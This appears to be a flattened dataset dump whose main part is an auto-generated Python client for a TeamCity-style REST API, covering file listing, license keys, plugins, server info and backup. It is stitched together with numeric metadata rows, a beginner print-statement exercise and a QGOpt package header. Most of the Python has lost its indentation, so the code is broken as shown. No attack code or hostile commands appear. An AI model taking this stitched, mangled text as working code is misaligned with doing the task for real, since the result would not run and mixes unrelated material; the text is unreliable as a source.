asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_children_with_http_info(path, area_id, async_req=True)
>>> result = thread.get()
        :param async_req: bool
:param str path: (required)
:param str area_id: (required)
:param str base_path:
:param str locator:
:param str fields:
:return: Files
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['path', 'area_id', 'base_path', 'locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_children" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'path' is set
if ('path' not in params or
params['path'] is None):
raise ValueError("Missing the required parameter `path` when calling `get_children`") # noqa: E501
# verify the required parameter 'area_id' is set
if ('area_id' not in params or
params['area_id'] is None):
raise ValueError("Missing the required parameter `area_id` when calling `get_children`") # noqa: E501
        if 'path' in params and not re.search(r'(\/.*)?', params['path']): # noqa: E501
            raise ValueError(r"Invalid value for parameter `path` when calling `get_children`, must conform to the pattern `/(\/.*)?/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'path' in params:
if isinstance(params['path'], TeamCityObject):
path_params['path'] = params['path'].locator_id
else:
path_params['path'] = params['path'] # noqa: E501
if 'area_id' in params:
if isinstance(params['area_id'], TeamCityObject):
path_params['areaId'] = params['area_id'].locator_id
else:
path_params['areaId'] = params['area_id'] # noqa: E501
query_params = []
if 'base_path' in params:
query_params.append(('basePath', params['base_path'])) # noqa: E501
if 'locator' in params:
query_params.append(('locator', params['locator'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/files/{areaId}/children{path}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Files', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_children_alias_with_http_info(self, path, area_id, **kwargs): # noqa: E501
"""get_children_alias # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_children_alias_with_http_info(path, area_id, async_req=True)
>>> result = thread.get()
        :param async_req: bool
:param str path: (required)
:param str area_id: (required)
:param str base_path:
:param str locator:
:param str fields:
:return: Files
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['path', 'area_id', 'base_path', 'locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_children_alias" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'path' is set
if ('path' not in params or
params['path'] is None):
raise ValueError("Missing the required parameter `path` when calling `get_children_alias`") # noqa: E501
# verify the required parameter 'area_id' is set
if ('area_id' not in params or
params['area_id'] is None):
raise ValueError("Missing the required parameter `area_id` when calling `get_children_alias`") # noqa: E501
if 'path' in params and not re.search('(.*)?', params['path']): # noqa: E501
raise ValueError("Invalid value for parameter `path` when calling `get_children_alias`, must conform to the pattern `/(.*)?/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'path' in params:
if isinstance(params['path'], TeamCityObject):
path_params['path'] = params['path'].locator_id
else:
path_params['path'] = params['path'] # noqa: E501
if 'area_id' in params:
if isinstance(params['area_id'], TeamCityObject):
path_params['areaId'] = params['area_id'].locator_id
else:
path_params['areaId'] = params['area_id'] # noqa: E501
query_params = []
if 'base_path' in params:
query_params.append(('basePath', params['base_path'])) # noqa: E501
if 'locator' in params:
query_params.append(('locator', params['locator'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/files/{areaId}/{path}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Files', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_content_with_http_info(self, path, area_id, **kwargs): # noqa: E501
"""get_content # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_content_with_http_info(path, area_id, async_req=True)
>>> result = thread.get()
        :param async_req: bool
:param str path: (required)
:param str area_id: (required)
:param str response_builder:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['path', 'area_id', 'response_builder'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_content" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'path' is set
if ('path' not in params or
params['path'] is None):
raise ValueError("Missing the required parameter `path` when calling `get_content`") # noqa: E501
# verify the required parameter 'area_id' is set
if ('area_id' not in params or
params['area_id'] is None):
raise ValueError("Missing the required parameter `area_id` when calling `get_content`") # noqa: E501
        if 'path' in params and not re.search(r'(\/.*)?', params['path']): # noqa: E501
            raise ValueError(r"Invalid value for parameter `path` when calling `get_content`, must conform to the pattern `/(\/.*)?/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'path' in params:
if isinstance(params['path'], TeamCityObject):
path_params['path'] = params['path'].locator_id
else:
path_params['path'] = params['path'] # noqa: E501
if 'area_id' in params:
if isinstance(params['area_id'], TeamCityObject):
path_params['areaId'] = params['area_id'].locator_id
else:
path_params['areaId'] = params['area_id'] # noqa: E501
query_params = []
if 'response_builder' in params:
query_params.append(('responseBuilder', params['response_builder'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/files/{areaId}/content{path}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_content_alias_with_http_info(self, path, area_id, **kwargs): # noqa: E501
"""get_content_alias # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_content_alias_with_http_info(path, area_id, async_req=True)
>>> result = thread.get()
        :param async_req: bool
:param str path: (required)
:param str area_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['path', 'area_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_content_alias" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'path' is set
if ('path' not in params or
params['path'] is None):
raise ValueError("Missing the required parameter `path` when calling `get_content_alias`") # noqa: E501
# verify the required parameter 'area_id' is set
if ('area_id' not in params or
params['area_id'] is None):
raise ValueError("Missing the required parameter `area_id` when calling `get_content_alias`") # noqa: E501
        if 'path' in params and not re.search(r'(\/.*)?', params['path']): # noqa: E501
            raise ValueError(r"Invalid value for parameter `path` when calling `get_content_alias`, must conform to the pattern `/(\/.*)?/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'path' in params:
if isinstance(params['path'], TeamCityObject):
path_params['path'] = params['path'].locator_id
else:
path_params['path'] = params['path'] # noqa: E501
if 'area_id' in params:
if isinstance(params['area_id'], TeamCityObject):
path_params['areaId'] = params['area_id'].locator_id
else:
path_params['areaId'] = params['area_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/files/{areaId}/files{path}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_license_key_with_http_info(self, license_key, **kwargs): # noqa: E501
"""get_license_key # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_license_key_with_http_info(license_key, async_req=True)
>>> result = thread.get()
        :param async_req: bool
:param str license_key: (required)
:param str fields:
:return: LicenseKey
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['license_key', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_license_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'license_key' is set
if ('license_key' not in params or
params['license_key'] is None):
raise ValueError("Missing the required parameter `license_key` when calling `get_license_key`") # noqa: E501
collection_formats = {}
path_params = {}
if 'license_key' in params:
if isinstance(params['license_key'], TeamCityObject):
path_params['licenseKey'] = params['license_key'].locator_id
else:
path_params['licenseKey'] = params['license_key'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/licensingData/licenseKeys/{licenseKey}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LicenseKey', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_license_keys_with_http_info(self, **kwargs): # noqa: E501
"""get_license_keys # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_license_keys_with_http_info(async_req=True)
>>> result = thread.get()
        :param async_req: bool
:param str fields:
:return: LicenseKeys
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_license_keys" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/licensingData/licenseKeys', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LicenseKeys', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_licensing_data_with_http_info(self, **kwargs): # noqa: E501
"""get_licensing_data # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_licensing_data_with_http_info(async_req=True)
>>> result = thread.get()
        :param async_req: bool
:param str fields:
:return: LicensingData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_licensing_data" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/licensingData', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LicensingData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_metadata_with_http_info(self, path, area_id, **kwargs): # noqa: E501
"""get_metadata # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_metadata_with_http_info(path, area_id, async_req=True)
>>> result = thread.get()
        :param async_req: bool
:param str path: (required)
:param str area_id: (required)
:param str fields:
:return: File
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['path', 'area_id', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_metadata" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'path' is set
if ('path' not in params or
params['path'] is None):
raise ValueError("Missing the required parameter `path` when calling `get_metadata`") # noqa: E501
# verify the required parameter 'area_id' is set
if ('area_id' not in params or
params['area_id'] is None):
raise ValueError("Missing the required parameter `area_id` when calling `get_metadata`") # noqa: E501
        if 'path' in params and not re.search(r'(\/.*)?', params['path']): # noqa: E501
            raise ValueError(r"Invalid value for parameter `path` when calling `get_metadata`, must conform to the pattern `/(\/.*)?/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'path' in params:
if isinstance(params['path'], TeamCityObject):
path_params['path'] = params['path'].locator_id
else:
path_params['path'] = params['path'] # noqa: E501
if 'area_id' in params:
if isinstance(params['area_id'], TeamCityObject):
path_params['areaId'] = params['area_id'].locator_id
else:
path_params['areaId'] = params['area_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/files/{areaId}/metadata{path}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='File', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_root_with_http_info(self, area_id, **kwargs): # noqa: E501
"""get_root # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_root_with_http_info(area_id, async_req=True)
>>> result = thread.get()
        :param async_req: bool
:param str area_id: (required)
:param str base_path:
:param str locator:
:param str fields:
:return: Files
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['area_id', 'base_path', 'locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_root" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'area_id' is set
if ('area_id' not in params or
params['area_id'] is None):
raise ValueError("Missing the required parameter `area_id` when calling `get_root`") # noqa: E501
collection_formats = {}
path_params = {}
if 'area_id' in params:
if isinstance(params['area_id'], TeamCityObject):
path_params['areaId'] = params['area_id'].locator_id
else:
path_params['areaId'] = params['area_id'] # noqa: E501
query_params = []
if 'base_path' in params:
query_params.append(('basePath', params['base_path'])) # noqa: E501
if 'locator' in params:
query_params.append(('locator', params['locator'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/files/{areaId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Files', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_zipped_with_http_info(self, path, area_id, **kwargs): # noqa: E501
"""get_zipped # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_zipped_with_http_info(path, area_id, async_req=True)
>>> result = thread.get()
        :param async_req: bool
:param str path: (required)
:param str area_id: (required)
:param str base_path:
:param str locator:
:param str name:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['path', 'area_id', 'base_path', 'locator', 'name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_zipped" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'path' is set
if ('path' not in params or
params['path'] is None):
raise ValueError("Missing the required parameter `path` when calling `get_zipped`") # noqa: E501
# verify the required parameter 'area_id' is set
if ('area_id' not in params or
params['area_id'] is None):
raise ValueError("Missing the required parameter `area_id` when calling `get_zipped`") # noqa: E501
        if 'path' in params and not re.search(r'(\/.*)?', params['path']): # noqa: E501
            raise ValueError(r"Invalid value for parameter `path` when calling `get_zipped`, must conform to the pattern `/(\/.*)?/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'path' in params:
if isinstance(params['path'], TeamCityObject):
path_params['path'] = params['path'].locator_id
else:
path_params['path'] = params['path'] # noqa: E501
if 'area_id' in params:
if isinstance(params['area_id'], TeamCityObject):
path_params['areaId'] = params['area_id'].locator_id
else:
path_params['areaId'] = params['area_id'] # noqa: E501
query_params = []
if 'base_path' in params:
query_params.append(('basePath', params['base_path'])) # noqa: E501
if 'locator' in params:
query_params.append(('locator', params['locator'])) # noqa: E501
if 'name' in params:
query_params.append(('name', params['name'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/files/{areaId}/archived{path}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __serve_plugins_with_http_info(self, **kwargs): # noqa: E501
"""serve_plugins # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__serve_plugins_with_http_info(async_req=True)
>>> result = thread.get()
        :param async_req: bool
:param str fields:
:return: Plugins
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method serve_plugins" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/plugins', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Plugins', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __serve_server_info_with_http_info(self, **kwargs): # noqa: E501
"""serve_server_info # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__serve_server_info_with_http_info(async_req=True)
>>> result = thread.get()
        :param async_req: bool
:param str fields:
:return: Server
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method serve_server_info" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Server', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __serve_server_version_with_http_info(self, field, **kwargs): # noqa: E501
"""serve_server_version # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__serve_server_version_with_http_info(field, async_req=True)
>>> result = thread.get()
        :param async_req: bool
:param str field: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['field'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method serve_server_version" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'field' is set
if ('field' not in params or
params['field'] is None):
raise ValueError("Missing the required parameter `field` when calling `serve_server_version`") # noqa: E501
collection_formats = {}
path_params = {}
if 'field' in params:
if isinstance(params['field'], TeamCityObject):
path_params['field'] = params['field'].locator_id
else:
path_params['field'] = params['field'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/{field}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __start_backup_with_http_info(self, **kwargs): # noqa: E501
"""start_backup # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__start_backup_with_http_info(async_req=True)
>>> result = thread.get()
        :param async_req: bool
:param str file_name:
:param bool add_timestamp:
:param bool include_configs:
:param bool include_database:
:param bool include_build_logs:
:param bool include_personal_changes:
:param bool include_running_builds:
:param bool include_supplimentary_data:
:param BackupProcessManager body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['file_name', 'add_timestamp', 'include_configs', 'include_database', 'include_build_logs', 'include_personal_changes', 'include_running_builds', 'include_supplimentary_data', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method start_backup" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'file_name' in params:
query_params.append(('fileName', params['file_name'])) # noqa: E501
if 'add_timestamp' in params:
query_params.append(('addTimestamp', params['add_timestamp'])) # noqa: E501
if 'include_configs' in params:
query_params.append(('includeConfigs', params['include_configs'])) # noqa: E501
if 'include_database' in params:
query_params.append(('includeDatabase', params['include_database'])) # noqa: E501
if 'include_build_logs' in params:
query_params.append(('includeBuildLogs', params['include_build_logs'])) # noqa: E501
if 'include_personal_changes' in params:
query_params.append(('includePersonalChanges', params['include_personal_changes'])) # noqa: E501
if 'include_running_builds' in params:
query_params.append(('includeRunningBuilds', params['include_running_builds'])) # noqa: E501
if 'include_supplimentary_data' in params:
query_params.append(('includeSupplimentaryData', params['include_supplimentary_data'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/backup', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 38.678798
| 218
| 0.594581
| 7,631
| 66,953
| 4.939589
| 0.026864
| 0.047965
| 0.025256
| 0.032472
| 0.955033
| 0.944819
| 0.939911
| 0.929379
| 0.92341
| 0.918475
| 0
| 0.015916
| 0.308395
| 66,953
| 1,730
| 219
| 38.701156
| 0.798121
| 0.281167
| 0
| 0.796541
| 1
| 0
| 0.193862
| 0.0459
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035605
| false
| 0
| 0.012208
| 0
| 0.101729
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b42823f40239c17859f4a2b140cda395d978f8cf
| 518
|
py
|
Python
|
Data Scientist Career Path/3. Python Fundamentals/6. Python Loop/1. Intro to Loop/1. loop.py
|
myarist/Codecademy
|
2ba0f104bc67ab6ef0f8fb869aa12aa02f5f1efb
|
[
"MIT"
] | 23
|
2021-06-06T15:35:55.000Z
|
2022-03-21T06:53:42.000Z
|
Data Scientist Career Path/3. Python Fundamentals/6. Python Loop/1. Intro to Loop/1. loop.py
|
shivaniverma1/Data-Scientist
|
f82939a411484311171465591455880c8e354750
|
[
"MIT"
] | null | null | null |
Data Scientist Career Path/3. Python Fundamentals/6. Python Loop/1. Intro to Loop/1. loop.py
|
shivaniverma1/Data-Scientist
|
f82939a411484311171465591455880c8e354750
|
[
"MIT"
] | 9
|
2021-06-08T01:32:04.000Z
|
2022-03-18T15:38:09.000Z
|
# Write 10 print() statements below!
print("This can be so much easier with loops!")
print("This can be so much easier with loops!")
print("This can be so much easier with loops!")
print("This can be so much easier with loops!")
print("This can be so much easier with loops!")
print("This can be so much easier with loops!")
print("This can be so much easier with loops!")
print("This can be so much easier with loops!")
print("This can be so much easier with loops!")
print("This can be so much easier with loops!")
| 43.166667
| 47
| 0.727799
| 95
| 518
| 3.968421
| 0.136842
| 0.238727
| 0.318302
| 0.371353
| 0.928382
| 0.928382
| 0.928382
| 0.928382
| 0.928382
| 0.928382
| 0
| 0.00464
| 0.167954
| 518
| 12
| 48
| 43.166667
| 0.87007
| 0.065637
| 0
| 1
| 0
| 0
| 0.788382
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 13
|
c3250f76c7eb68af55d6451ab5d627c3564607b7
| 179
|
py
|
Python
|
QGOpt/any_metric_manifolds/__init__.py
|
vnechaev/QGOpt
|
697f02d89df67a576cd6953ffdd2db62970727da
|
[
"Apache-2.0"
] | null | null | null |
QGOpt/any_metric_manifolds/__init__.py
|
vnechaev/QGOpt
|
697f02d89df67a576cd6953ffdd2db62970727da
|
[
"Apache-2.0"
] | null | null | null |
QGOpt/any_metric_manifolds/__init__.py
|
vnechaev/QGOpt
|
697f02d89df67a576cd6953ffdd2db62970727da
|
[
"Apache-2.0"
] | null | null | null |
"""The package contains class describing manifolds with arbitrary metrics"""
from QGOpt.any_metric_manifolds.stiefel import StiefelManifold
import QGOpt.any_metric_manifolds.utils
| 59.666667
| 76
| 0.865922
| 23
| 179
| 6.565217
| 0.73913
| 0.10596
| 0.18543
| 0.304636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078212
| 179
| 3
| 77
| 59.666667
| 0.915152
| 0.391061
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
